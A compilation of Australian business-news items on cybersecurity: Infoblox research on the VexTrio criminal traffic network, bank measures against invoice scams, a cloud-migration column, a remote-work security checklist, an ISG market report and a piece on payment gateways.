Digital Business

Infoblox exposes cybercrime group VexTrio operating a huge criminal affiliate program targeting Australia

INFOBLOX has released new research unveiling a set of large-scale malicious cybercriminal partnerships led by VexTrio, the group cybersecurity specialists refer to as ‘an insidious threat actor’.

The partnerships involve a more than 60-strong underground affiliate network and are seeing high volumes of malware and other malicious content delivered to networks in Australia, New Zealand and across the globe.

Formed more than six years ago, VexTrio is now one of the world’s largest malicious networks targeting internet users today.

“While cybercriminals are often portrayed as gangs of hackers or lone brilliant coders, more often they buy and sell goods and services as part of a larger criminal economy,” Infoblox head of threat intelligence, Renée Burton said. Now operating in the commercial cybersecurity world, Ms Burton is a former senior executive (DISL) with the US National Security Agency (NSA).  

“For example, some actors sell malware services, and malware-as-a-service (MaaS) allows buyers easy access to the infrastructure necessary to commit crimes. These service providers also form strategic partnerships, similar to the way legitimate companies do, in order to extend the limits of their current operations.

“Such relationships are forged in secret and may include a number of partners, making them difficult to untangle and understand from an outside perspective.”

VexTrio acts as a cybercriminal broker and operates traffic distribution systems (TDS) that route users based on their device, operating system, location, and other characteristics to malicious websites.

VexTrio has largely evaded detection and strengthened its resilience against internet service providers’ efforts to suspend its assets, all while building up a unique ‘partner program’.

Key findings of report

The report has identified that VexTrio creates the single most pervasive threats in Infoblox customers’ networks, active in more than 50 percent of networks in just the last two years.

The threat actor acts as a broker of malicious traffic for more than 60 cybercriminal affiliates.

Partnerships tend to be longstanding and operate in a unique way, with VexTrio providing a number of dedicated servers to each affiliate.

Despite connecting millions of web users to malicious content for more than six years, VexTrio has largely evaded detection due to its successful business model that feeds on web traffic from its affiliates and has infrastructure built on compromised websites.

Two of its largest affiliates are ClearFake and SocGholish; malicious JavaScript frameworks that present website visitors with harmful content and inject malicious JavaScript into vulnerable websites, respectively. SocGholish is widely considered to be one of the top three global threats today.

VexTrio is a prolific domain name system (DNS) attacker and has more than 70,000 known malicious domains.

Drive-by compromise attacks

According to Infoblox, the most common attack method deployed by VexTrio and its affiliates has so far been the ‘drive-by compromise’, where actors compromise vulnerable WordPress websites and inject malicious JavaScript into their HTML pages. 

This script typically contains a TDS that redirects victims to malicious infrastructure and gathers information such as their IP address. VexTrio also operates SMS scams where it sells victims’ phone numbers to other cybercriminals.

“Although difficult to identify and track, blocking VexTrio at the DNS level can disrupt and protect against a large spectrum of cybercriminal activity,” Ms Burton said.

“This can be achieved through using tailored DNS signatures and statistical-based algorithms to identify VexTrio’s intermediary TDS servers and domains shortly after they are registered.

As Australian organisations look to raise their security posture in the wake of the new Cyber Security Strategy, it’s important to understand how DNS threat actors like VexTrio operate, particularly as more than 90 percent of malware depends on DNS at some stage of its execution.”

Infoblox specialises in uniting networking and security to deliver high performance and high protection at the same time. Many Fortune 100 companies are Infoblox clients as well as an ‘emerging innovators’ group for whom cyber security is evermore paramount. Infoblox promises “real-time visibility and control over who and what connects to your network, so your organization runs faster and stops threats earlier”.

The full report on VexTrio and its affiliate network can be found here.

Infoblox.com

Infoblox is also on LinkedIn and Twitter.

 

 

ends

ASBFEO backs banking industry pledge to head off scammers crippling small businesses

THE Australian Small Business and Family Enterprise Ombudsman (ASBFEO), Bruce Billson, has welcomed the significant commitment announced today by the banking industry to "better support small businesses to combat scams".

Mr Billson said a $100 million upgrade across the banking sector to confirm who money is being paid to by matching names with account numbers will particularly benefit small businesses who too often fall victim to the invoice substitution scam. 

“Nefarious cyber criminals can wreak havoc for a small business but sadly the number of scams and the size of the losses for small and family businesses is growing,” Mr Billson said.

“When a criminal impersonates your business, it not only costs you and your customers money but can damage your brand and lead to a loss of consumer trust and confidence and the ability to operate. Too often, it can be an enterprise-ending event for a small business.”

Scamwatch data shows small businesses lost $13.7 million to scams last year, a 95 percent increase compared with the previous year. The biggest contributor to these losses were payment redirection scams.

Mr Billson said small businesses had been particularly vulnerable to the invoice substitution scam – also called payment redirection scams or business email compromise – where cyber criminals get into their computer system and intercept emails to customers and insert different bank account details.

“A small business sends an invoice to somebody and the criminal changes the banking details," Mr Billson said. "When it lands in the customer's inbox, it looks legit and is a bill they were expecting so they pay it. The money goes to the criminal’s bank account and is quickly shifted, usually to crypto currency, and is gone.

“These jokers run off with the money, the customer has done their dough, and the small business hasn’t been paid," he said.

“ASBFEO has been highlighting the urgent need for a ‘confirmation of payee’ scheme to be introduced in Australia, noting similar programs operate in other countries offering a really practical safeguard. This ensures people can confirm they are transferring money to the person intended and that names are matched to BSB and account numbers.

“Today’s pledge by the banking industry to roll out a new confirmation of payee system will go a long way to stopping scammers being able to divert invoice payments by simply and silently changing a bank account number.”

Mr Billson noted the package of measures announced by the Australian Banking Association and the Customer Owned Banking Association will apply to commercial banks, customer owned banks, mutual banks, building societies and credit unions.

It will include more use of biometric checks and other controls to prevent scammers opening fraudulent bank accounts in other people’s names by using stolen information from driver’s licences, passports and other identity documents.

There will also be increased warnings and payment delays for suspicious transactions, limits on high-risk payment channels, which can include crypto platforms, and greater intelligence sharing across the banking sector using the Australian Financial Crimes Exchange.

However, Mr Billson said beating the scammers relied upon everyone being at their best by doing what they can to tackle the scourge of cyber crime and to “listen to our Spidey senses if something doesn’t seem right”.

“Business owners wouldn’t leave the door open with the light on at night when there's no one there, so they must take the right steps and safeguards in the digital world,” Mr Billson said.

“Telecommunication companies are trying to do their bit via what's called a ‘clean pipes’ initiative, where they cut off a lot of cyber threat traffic through the telecommunications infrastructure.

“And just last week the Australian Government announced two programs offering small businesses practical help to minimise the chance of falling victim to a cyber attack and to better prepare them to bounce back."

Mr Billson said next week is Scam Awareness Week and an ideal time for small business owners to take a few extra moments to check they have appropriate safeguards in place.

“Scamwatch says three in every four scam reports involve criminals pretending to be people we should trust,” Mr Billson said.

The new National Anti-Scam Centre said small business owners who feared they had fallen victim should contact the Report a Scam website (www.scamwatch.gov.au/report-a-scam) and dedicated resources to combat scams can be found at www.scamwatch.gov.au.

The Australian Cyber Security Centre, through the cyber.gov.au website, provides resources and guides for small businesses on how to manage information and secure their businesses, including a free Cyber Security Assessment Tool that can help identify the cyber security strengths of a business and learn how to improve cyber security: www.cyber.gov.au/resources-business-and-government/essential-cyber-security/smallbusiness

The website also contains information on how to recover and small businesses can report cyber attack incidents through 1300 CYBER1.

The ASBFEO website includes simple steps and a checklist to better protect small businesses: asbfeo.gov.au/resources-tools-centre/cyber-security.

ASBFEO's website also has a video offering tips which can be viewed at: www.youtube.com/watch?v=lxoZ1vjbalg

 

ends

 

Cyber attacks and other key misconceptions that derail the cloud journey for small-medium businesses

By Josh McHugh-Cullen >>

MANY small to medium business (SMB) owners share a common misconception. In a world of rapidly accelerating cybercrime targeting enterprises, public infrastructure, and even governments, they often think they are far too small to entice hackers or cybercriminals.

On the one hand, cyberattacks on SMBs are unlikely to make the news in the same way that breaches impacting the personal details of millions of Australians will. However, that does not mean SMBs are immune to attacks.

Between July 2021 and June 2022, the Australian Cyber Security Centre (ACSC) received over 76,000 cybercrime reports. The average cost per cybercrime reported was over $39,000 for small businesses, $88,000 for medium businesses, and over $62,000 for large businesses. Unfortunately, SMBs are being targeted by threat actors, and the costs are significant. 

Cyberattacks are increasingly sophisticated and SMBs are being targeted because they are often viewed as easier targets than enterprises that are able to invest heavily in cybersecurity.

This means that SMB leaders need to prioritise cybersecurity in the most effective and cost-efficient way possible—which is migrating to the cloud and leveraging built-in, cloud-first security protocols.

Improved security is only one of the many benefits of the cloud for SMBs. Access to new business models, reduced costs, improved collaboration, and better opportunities for innovation are giving SMBs an edge in the competitive market.

Misconceptions are derailing the cloud journey for SMBs

Despite these benefits, some SMBs are still hesitant about the cloud. The most common concerns include:  

  • Security: SMBs often fear that cloud services might be more susceptible to hacking, data breaches, or unauthorised access compared to on-premises solutions.
  • Cost: while cloud services reduce costs in the long term, initial costs and ongoing subscription fees are sometimes believed to be more expensive than existing on-premises servers.
  • Customisation: out-the-box cloud services are built to cater to a broad audience, and this lack of customisation can be frustrating for SMBs that have unique processes or specific workflow requirements. 
  • Dependency: when a business moves its data and services to the cloud, it becomes dependent on the cloud service provider, creating concerns about business continuity and reliability. 
  • Compliance: SMBs might not be sure if the cloud provider meets the necessary compliance standards or how to ensure that they remain compliant while using cloud services. 
  • Data sovereignty: data is subject to the laws and governance structures of the country in which it is located. By storing data in the cloud, it might be stored in a different country with different laws regarding data privacy and security.  
  • Legacy systems: transitioning to the cloud can mean abandoning investments into legacy systems.

While these concerns are persistent, even after many cloud-native businesses have proven the agility and flexibility of operating in the cloud, they are unfounded.

For example, the cloud can mitigate the risk of cybercrime and prevent hackers from accessing and capitalising on sensitive data that can compromise employees, suppliers, customers, and businesses. Cloud migration can be a minimal initial investment that opens up more budgeting agility with fixed monthly subscription costs or pay-per-use consumption models.

The dependency on cloud up-time is also an unfounded fear, as most clouds have several redundancies built in, offering high levels of guaranteed uptime. Similarly, out-the-box services are built on best practice and actually help SMBs to follow tried and tested processes that support business growth rather than investing in expensive customisations that are difficult to scale.  

Finally, the cloud offers SMBs the ability to reduce costs associated with IT teams, deliver on-demand work environments, provide readily accessible data in real-time, and improve decision-making and the customer experience.

Simplified migrations to the cloud

Operating in the cloud can be both simple and intuitive; however, migrating to the cloud is often more complex than many SMBs expect. A DIY approach tends to feed into the concerns SMBs initially had, derailing digital transformation even further.  

The different types of clouds and services, each with their own advantages and disadvantages, can be overwhelming. Migration to the cloud requires a thorough assessment of the business’s infrastructure, careful planning, testing and retesting, scaling, and ongoing management.

Enlisting the support of experienced partners can alleviate the complexity associated with cloud migration and help SMBs identify the best cloud solution for their needs while providing guidance on using these solutions effectively. 

 

About the author

Josh McHugh-Cullen is the regional sales executive for ECI Software Solutions. ECI Software Solutions’ mission is to empower the entrepreneurial spirit, assisting small and medium-sized businesses to compete and grow by providing industry expertise and purpose-built solutions that make doing business easier. www.ecisolutions.com

ends

Cybersecurity checklist for working remotely 

WHILE REMOTE WORK offers flexibility and new opportunities, it also presents cybersecurity challenges.

As more organisations adopt remote and hybrid working practices, there is an increase in access to sensitive data from various locations. This has caused targeted attacks to rise, often exploiting human emotions through tactics like phishing, pretexting, and baiting.  

TeamViewer Asia-Pacific president, Sojung Lee, said, “Social engineering attackers have used these tactics for a long time. These tactics work because they prey on human nature, manipulating it to gain unauthorised access to confidential information. 

“Unfortunately, attacks are becoming more personalised and targeted, making it essential for every team to recognise these dangers and be prepared to fight against them.” 

Cybersecurity checklist for remote working 

Ms Lee said very few people were information technology (IT) experts and many may not know where to start. However, following the advice of a cybersecurity checklist can help companies keep safe from cyber threats, even when employees are working remotely. 

Check 1 — Education and awareness:  

  • Recognise targeted attacks: regularly train staff to identify spear phishing, whaling, and other targeted attacks that exploit personal information. 
  • Avoid unknown devices and baiting:educate employees not to plug unfamiliar devices like USBs into their systems. Highlight the risks of baiting, where malicious devices are left for workers to find.
  • Implement protocols against pretexting: establish protocols and code words to minimise risks from pretexters impersonating legitimate access holders, such as vendors or technical support. 
  • Encourage caution with personal information: warn against sharing personal details that could be used in spear phishing campaigns. 
  • Promote continuous education: emphasise that ongoing learning is the cornerstone of cybersecurity, especially in remote settings. 

Check 2 — Implement protocols and leverage technology: 

  • Use multi-factor authentication (MFA): employ MFA for connections and accounts for added security. 
  • Restrict USB port usage: control access to USB ports or use alternatives that remove the need for physical devices. 
  • Implement secure access features: use methods that ensure connection without passwords for stronger validation. 
  • Leverage certificates: company-wide certificates, paired with trusted services that allow their implementation, provide easy and highly secure access. 

Check 3 — Promote password best practices:

  • Encourage unique passwords: advocate for different passwords across various sites and services. 
  • Recommend trusted password managers:promote the use of reliable tools for secure password storage. 
  • Cultivate good password hygiene:foster a culture that appreciates and practises secure password habits. 

“In a world where remote access is integral to business, organisations need to take full responsibility and implement a strict zero-trust policy, limiting access to critical resources and confidential information with designated role management and conditional access capabilities,” Ms Lee said.

“Together with an educated workforce organisations can build a resilient, multi-layered defence, mitigating the constant threat of security incidents. 

“Having a cybersecurity checklist is more than just a set of guidelines, it’s an essential part of business strategy in the remote working era,” she said.

“By adhering to these principles and leveraging the right technological solutions, organisations can maintain integrity and resilience against the constantly evolving cyber threats. 

“It’s essential to always err on the side of caution and recognise that social engineering preys on human nature itself. Understanding this is the key to preventing companies from becoming the next victim of these time-tested strategies.” 

www.teamviewer.com

ends

Australian businesses strengthen cybersecurity, rattled by major organisational breaches

AUSTRALIAN enterprise leaders are steadily recognising and unearthing growing threats, assessing risks and changing strategies to better detect and respond to attacks, according to a new ISG Provider Lens report

The recent series of damaging, high-profile data leaks in Australia has changed the way Australian organisations approach enterprise security and procure cybersecurity services, according to the new research published today by Information Services Group (ISG, Nasdaq: III), a global technology research and advisory firm with runs on the board in cybersecurity.

The 2023 ISG Provider Lens Cybersecurity Solutions and Services report for Australia has found the attacks revealed escalating threats and changed cybersecurity from solely an information technology (IT) issue to a closely monitored enterprise challenge.

“Australian companies recognise the business dangers of data leaks,” ISG Cybersecurity director for ANZ and Asia Pacific, Joyce Harkness said.

“Top management and boards are increasingly interested in cyber risk and the quantification of such risk, and are involved in decision-making about strategies, products and services.” 

The Australian Government has strengthened the country’s cybersecurity response by imposing the Notifiable Data Breaches (NDB) scheme, which requires organisations to report breaches, and working with the state of South Australia to establish the Australian Cyber Collaboration Centre, an incubator for new security solutions and initiatives.

More recently, the Federal Government unveiled the 2023-2030 Australian Cyber Security Strategy, aimed at making Australia one of the most cyber secure nations in the world by 2030. The government also appointed the Australia’s first cyber security coordinator and began operationalising the Security of Critical Infrastructure Act 2018.

Plugging security capability gaps

Recent attacks revealed that even large Australian enterprises had cyber capability gaps, the report said.

Most had invested heavily in cybersecurity controls but focused only on preventing breaches and assumed all sensitive data was in offices. In reality, the ‘attack surface’ has expanded with the rise of remote work, digital engagement, an expanding supply chain and the internet of things (IoT).

Mistakes inside organisations and among IT provider partners, such as employees falling prey to phishing attacks or making configuration errors, are thought to have played a major role in recent leaks in Australia and elsewhere.

ISG reported that, as a result, Australian enterprises had “begun to assess their risk tolerance, evaluate current controls and take an ‘assume breach’ approach, recognising that not all breaches can be prevented and focusing on rapid detection and response”.

As they migrate to the cloud over the next few years, many Australian companies are expected to invest in cloud-based solutions, such as extended detection and response (XDR), the report said.

The report deduced that companies with multiple cybersecurity tools, “which often generate false positives that require manual intervention” will also need greater automation and interoperability to relieve the pressure on security operations centres (SOCs). The role of artificial intelligence (AI) is expected to grow exponentially, often to secure IoT assets.

“We expect strong growth in the Australian security market over the next five years,” ISG Provider Lens Research partner and global leader, Jan Erik Aase said.

“Enterprises and providers will be investing heavily in both new technologies and essential skills.”

Australian business tries to get it right

The report also explored other cybersecurity trends in Australia, including the increasing adoption of zero-trust frameworks and next-generation identity and access management (IAM) to maintain high-level security while enabling improved customer experience.

The 2023 ISG Provider Lens Cybersecurity Solutions and Services report for Australia evaluates the capabilities of 82 providers across six quadrants: identity and access management (IAM), extended detection and response (XDR), security service edge (SSE), technical security services, strategic security services, and managed security services (SOC).

The report named IBM as a leader in four quadrants. It names Accenture, CyberCX, Deloitte, DXC Technology, Fujitsu, NTT DATA, Telstra, Tesserent, Verizon Business and Wipro as Leaders in three quadrants each. Microsoft is named as a Leader in two quadrants.

Bitdefender, Broadcom, Cato Networks, CGI, Cisco, CrowdStrike, CyberArk, EY, Forcepoint, HCLTech, Infosys, Kasada, KPMG, Netskope, Okta, Palo Alto Networks, Ping Identity, PwC, SailPoint, Tech Mahindra, Unisys, Versa Networks, VMware and Zscaler are named as leaders in one quadrant each.

In addition, Kyndryl is named as a ‘rising star’ — a company with a “promising portfolio” and “high future potential” by ISG’s definition — in two quadrants. BeyondTrust, HPE (Aruba), Macquarie Telecom Group and SentinelOne are named as rising stars in one quadrant each.

The 2023 ISG Provider Lens Cybersecurity Solutions and Services report for Australia is available through https://isg-one.com

 

ends

Why investing in reliable payment gateways is crucial for business success

By Ricky Blacker >>

AN ONLINE STORE’s primary purpose is to generate conversions. To succeed, the website must provide an efficient, secure and positive customer experience.

With digital wallets increasingly overtaking credit cards for online payments (Global Payments Report FIS), it is more important than ever for businesses to accommodate a range of payment methods and ensure they function smoothly.

Payment gateways are what make online payments possible, as they connect a business’s website to its merchant account, such as PayPal or Stripe. Depending on the merchant(s) selected, a business can accept payments in a range of currencies and leverage different plug-ins to tailor the checkout process based on business and customer preferences. 

It’s important to choose a strong, reliable payment gateway to protect the reputation and financial success of the business. An inefficient payment gateway, or worse, an error in the platform, can result in additional processing fees or even legal implications. 

Time spent rectifying technical issues may also increase website downtime, thereby impacting potential sales. Together, these can negatively affect the user experience and trust in brand.

Trusted payment gateways make your customers ‘secure’ with you

If customers do not feel safe entering their payment details via your website, they are likely to seek and choose an alternative provider.

In contrast, adopting trusted payment gateways ensures that the final stage of the purchase is easy, which can avoid last minute change of mind, increase the customer’s basket size and encourage repeat purchases.

Once installed, the payment gateways do need to be kept updated and operating at optimal level. This maintenance may seem tedious and complicated but it is crucial for success.

Fortunately, choosing a quality website hosting platform can make this process much easier. For example, WP Engine works seamlessly with WooCommerce, one of the most powerful and flexible platforms to transform websites into online stores, to enable easy integration.

By selecting a managed WooCommerce hosting service, businesses can also outsource website management, ensuring site speed optimisation, automatic updates and free Secure Socket Layer (SSL) certificates are maintained as necessary. This means businesses get time back to focus on their product and service offerings

Success is all about trust

Recognised and trusted payment processing gateways are highly beneficial in gaining consumer trust. When customers see a trusted brand logo such as Stripe, they instantly have peace of mind that any payment details they input will be handled securely.

Choosing a website hosting platform that integrates deeply with one or more trusted payment gateways can accelerate and simplify payment gateway set up.

For example, WP Engine’s new Stripe Connect integration includes Stripe in the WooCommerce store building and management process, so there’s no need to seek out or pay for add-ons — it’s preconfigured to just work.

This new offering also makes Stripe integrations more secure, as businesses can connect to an existing Stripe account without using API keys and credentials.

A good payment gateway needs strong website infrastructure to support it. A slow website that lacks a robust security infrastructure can increase the risk of website crashes and data leaks.

Long loading times may also deter customers from completing their purchase or result in payment processes timing out.

In the best case, this can impact brand reputation. In the worst case, this may lead to incorrect or duplicate payments, resulting in customer frustration.

Therefore, businesses should ensure they constantly optimise their website for speed and ensure they adhere to basic cyber hygiene principles, such as ensuring plug-ins are updated.

Consider managed web hosting

For businesses who want to make efficient use of time and resources, working with a managed web hosting platform or agency can greatly alleviate workloads and pressure.

For example, WP Engine leverages automated plug-in and WordPress updates to ensure vulnerabilities are repaired as soon as possible.

Reliable payment gateways are a key factor to increase business sales and overall success. Not only do they affect sales and conversions, they also impact consumer trust and brand reputation.

By choosing reliable payment gateways and working with a web hosting platform that enables easy integration and management, businesses can succeed online while having more time and resources to focus on what they do best.

www.wpengine.com.au

 

About the author    

Ricky Blacker is a senior sales engineer and WordPress ‘evangelist’ at WP Engine, a Brisbane-headquartered company that has developed into one of the world’s leading managed WordPress platforms and hosting services. WP Engine has been voted the number one WordPress platform globally in 2023.

ends

Contact Us

 

PO Box 2144
MANSFIELD QLD 4122